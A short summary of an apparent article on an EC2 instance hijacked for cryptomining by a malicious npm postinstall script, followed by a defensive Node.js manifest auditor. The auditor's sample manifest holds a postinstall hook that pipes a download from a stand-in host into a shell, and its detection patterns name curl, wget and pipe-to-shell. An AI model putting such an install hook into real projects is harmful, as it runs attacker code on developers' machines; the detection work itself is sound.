How "Vibe Coding" Accidentally Turned My EC2 Instance Into a Cryptominer

A developer's EC2 instance was compromised due to a malicious postinstall script in their project's package.json file. The script, which used the non-existent 'child_process' package, ran silently with root permissions and turned the instance into a cryptominer. To fix the issue, the developer removed the malicious line from package.json, wiped the node_modules and lockfile, and rebuilt the container from scratch. This highlights the importance of secure coding practices and the need to monitor outbound traffic.
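
An added example, not code from the article or its author: a Node.js check for the two things the summary describes, an install-time lifecycle script and a dependency named after a Node built-in. The hook list, the patterns and the sample manifest are assumptions constructed for illustration.

```javascript
// Hooks npm runs automatically during `npm install`, without an explicit `npm run`.
const AUTO_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Node built-ins never need installing; a registry package with the same name is unrelated code.
const CORE_MODULES = ["child_process", "fs", "http", "https", "net", "os", "crypto"];
// Assumed heuristics for things an install hook rarely needs; tune per codebase.
const SUSPICIOUS = [
  { tag: "remote-fetch", re: /\b(curl|wget)\b|https?:\/\//i },
  { tag: "pipe-to-shell", re: /\|\s*(ba|z)?sh\b/i },
  { tag: "inline-eval", re: /\bnode\s+(-e|--eval)\b|\beval\b/i },
  { tag: "process-spawn", re: /child_process|\bexec(Sync)?\s*\(/ },
  { tag: "encoded-payload", re: /base64|[A-Za-z0-9+\/]{80,}/ },
];

function auditManifest(manifestText) {
  let manifest;
  try { manifest = JSON.parse(manifestText); } catch (err) { manifest = null; }
  if (manifest === null || typeof manifest !== "object") {
    return [{ kind: "manifest", name: null, command: null, tags: ["unparseable"] }];
  }
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of AUTO_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    // Every auto-run hook is reported for review; tags say why it looks risky.
    const tags = SUSPICIOUS.filter((p) => p.re.test(command)).map((p) => p.tag);
    findings.push({ kind: "hook", name: hook, command, tags });
  }
  for (const field of ["dependencies", "devDependencies"]) {
    for (const dep of Object.keys(manifest[field] || {})) {
      if (CORE_MODULES.includes(dep)) {
        findings.push({ kind: "dependency", name: dep, command: null, tags: ["shadows-core-module"] });
      }
    }
  }
  return findings;
}

// Constructed sample manifest (not from the article); example.invalid never resolves.
const SAMPLE = JSON.stringify({
  name: "demo-app",
  scripts: {
    build: "tsc -p .",
    postinstall: "node -e \"require('child_process').exec('curl -s https://example.invalid/x.sh | sh')\"",
  },
  dependencies: { express: "^4.18.0", child_process: "^1.0.2" },
});
console.log(JSON.stringify(auditManifest(SAMPLE), null, 2));
```

Run a check like this on `package.json` in CI before the install step. Installing with `npm ci --ignore-scripts` keeps lifecycle hooks from running at all while the manifest is reviewed.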
